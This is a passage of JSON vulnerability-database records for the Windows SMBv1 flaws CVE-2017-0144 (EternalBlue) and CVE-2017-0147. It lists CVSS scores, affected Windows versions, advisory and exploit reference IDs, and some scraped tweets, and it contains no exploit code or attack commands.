["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 8.4, "vector": "NONE"}}, "hash": "29a618f5b1bff10fc513eac7318e8abfa3d7c51a08502334d5e93ed0625a2de7", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "c0953a82b0a69f93598bec4d6f0ddcb0", "key": "references"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 139}, "differentElements": ["references"], "edition": 2, "lastseen": "2019-10-04T12:18:44"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "013b6203cead14382a8f19ad32d99966"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "e9f80c9b0a5d969452d09ddbf4c74a71"}, {"key": "extraReferences", "hash": "fb65e2b51285ba6bbdd4e82c86d7dbc3"}, {"key": "href", "hash": "6fd95f86c673c4a8b4f1fd51b22d928f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "8378623388dea1b8ea71bec9adacab2c"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "3d33672b05b572e15dc2cac26ad54d7c"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "b1d215f72ec6f2e27faa61f328e46a1c2787a5b0c382c01a01ff757d377b37a3", "viewCount": 441, "enchantments": {"dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "symantec", "idList": ["SMNTC-96704"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "threatpost", "idList": ["THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:42030"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:4A6B394DCAF12E05136AE087248E228C"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "fireeye", "idList": ["FIREEYE:57B0F10A16E18DC672833B1812005B76", "FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:EA407B51944632C248FEB495594123EA", "THN:E18080D17705880B2E7B69B8AB125EA9"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 8.4, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 16, "tweets": [{"link": "https://twitter.com/AlqarniMazhood/status/1362380423721017347", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0633\u0647_\u0643\u062f\u062f\u062f\u0627?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384943024250228740", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/mohannad_1saad1/status/1362746840261816323", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0643\u0627\u0633_\u0627\u0644\u0633\u0639\u0648\u062f\u064a\u0629_\u0627\u0644\u0639\u0627\u0644\u0645\u064a_\u0644\u0644\u062e\u062e\u062e\u062e\u062e\u064a\u0644?src=hashtag_click"}, {"link": "https://twitter.com/AllahibiReem/status/1362691966404861952", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660."}, {"link": "https://twitter.com/omaryazeed665/status/1362621178637135873", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u064a\u0648\u0645_\u0627\u0644\u062c\u0645\u0639\u0647?src=hashtag_click"}, {"link": "https://twitter.com/bashayeralsallo/status/1362434722924818437", "text": "\u0644\u0645\u0627 \u062a\u0634\u063a\u0644 CVE-2017-0144 \u0639\u0644\u0649 \u0648\u064a\u0646\u062f\u0648\u0632 \u0661\u0660. \n/hashtag/\u0633\u0644\u0637\u0627\u0646?src=hashtag_click"}, {"link": "https://twitter.com/kitty14956590/status/1384942932843712514", "text": "when the CVE-2017-0144 sus"}, {"link": "https://twitter.com/Sid____/status/1382708880719933448", "text": "the most damaging one used by Russian govt. (and others) was CVE-2017-0144 commonly known as EternalBlue. We know why it will never make the \"list\"!"}, {"link": "https://twitter.com/Ricardo34834369/status/1404720281789292552", "text": "Wow so the most famous YT-1300 of all times is vulnerable to CVE-2017-0144 /hashtag/vulnerabilities?src=hashtag_click /hashtag/notreal?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click /hashtag/starwars?src=hashtag_click"}, {"link": "https://twitter.com/VulmonFeeds/status/1417191225837379593", "text": "CVE-2017-0144\n\nThe SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; ...\n\nhttps://t.co/foy373dLBH?amp=1"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "96704", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96704"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "42031", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42031/"}, {"name": "42030", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/42030/"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0147", "bulletinFamily": "NVD", "title": "CVE-2017-0147", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0147"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 4.6, "vector": "NONE"}}, "hash": "8bda709d82acdf4b6cbe850e442b4253f5914a04209ae65f2bfc4d9e6d4176ef", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "bf1f670b69a274ab442a5372b2d4378c", "key": "references"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "lastseen": "2020-02-05T13:14:20", 